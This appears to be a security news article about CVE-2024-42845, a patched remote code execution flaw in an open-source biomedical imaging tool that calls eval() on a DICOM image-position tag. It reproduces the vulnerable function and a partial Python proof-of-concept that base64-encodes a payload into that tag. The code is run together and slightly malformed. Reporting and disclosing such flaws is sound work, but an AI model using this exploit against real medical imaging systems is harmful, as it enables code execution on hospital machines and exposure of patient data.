A critical Remote Code Execution (RCE) vulnerability has been discovered in a popular open-source biomedical tool used worldwide.

This vulnerability, identified as CVE-2024-42845, has raised concerns about the safety of medical data and the integrity of imaging processes.

The vulnerability has been patched in the latest release, but the incident underscores the need for continuous vigilance in the healthcare software sector.

The vulnerability resides in the handling of DICOM (Digital Imaging and Communications in Medicine) files, a standard for transmitting, storing, and sharing medical images.

DICOM is widely adopted in hospitals and clinics globally, making any security flaws potentially far-reaching.

2024 MITRE ATT&CK Evaluation Results Released for SMEs & MSPs -> Download Free Guide

CVE-2024-42845 – the Vulnerability

The vulnerability, CVE-2024-42845, is associated with a function in the software that processes the DICOM standard tag (0x0020, 0x0032).

This tag contains the coordinates of the upper left-corner voxel of an image. The issue arises from the use of Python’s eval() function, which can execute arbitrary code if manipulated by a malicious actor.

def GetImagePosition(self):    try:        data = self.data_image[str(0x020)][str(0x032)].replace(“,”, “.”)    except KeyError:        return “”    if data:        return [eval(value) for value in data.split(“”)]    return “”

Here, the eval() function is called on data extracted from a DICOM file, allowing a malicious payload to be executed if injected into the image position index.

The challenge is that standard payloads are impeded by a character replacement operation within the code. However, attackers can circumvent this by encoding malicious commands using Base64, which is readily available in Python’s standard library.

Image patient

Code Exploit Example

To exploit the vulnerability, an attacker needs to modify or create a DICOM file, appending their payload as a fourth value in the tag at position (0x0020, 0x0032). Upon loading the modified file, the payload would be executed.

import pydicomimport base64def encode_payload(plain_payload):    data = open(plain_payload, ‘rb’).read()    return f”exec(import(‘base64’).b64decode({base64.b64encode(data)})”def prepare_dicom_payload(dicom_file_path, payload):    dicom_data = pydicom.dcmread(dicom_file_path)    values = dicom_data[0x0020, 0x0032].value    mal = [str(i) for i in values]    mal.append(encode_payload(payload))    # Further steps to save the modified DICOM file

Securing Medical Imaging Systems

This vulnerability highlights the importance of rigorous security practices in the development and deployment of medical imaging software.

Users of the affected software are advised to update to the latest version immediately. Developers should prioritize secure coding practices and consider additional input validation techniques to prevent similar vulnerabilities.

Dicom vulnerability

As per a report by Researcher Partywave, the discovery and responsible disclosure of this RCE vulnerability emphasize the collaborative efforts required to secure open-source medical tools.

While the vulnerability has been addressed, it serves as a reminder of the ongoing challenges facing cybersecurity in healthcare.

Their efforts ensure that the cybersecurity landscape in the medical field continues to strengthen, protecting sensitive patient data and enhancing the reliability of medical technologies.

Investigate Real-World Malicious Links, Malware & Phishing Attacks With ANY.RUN – Try for Free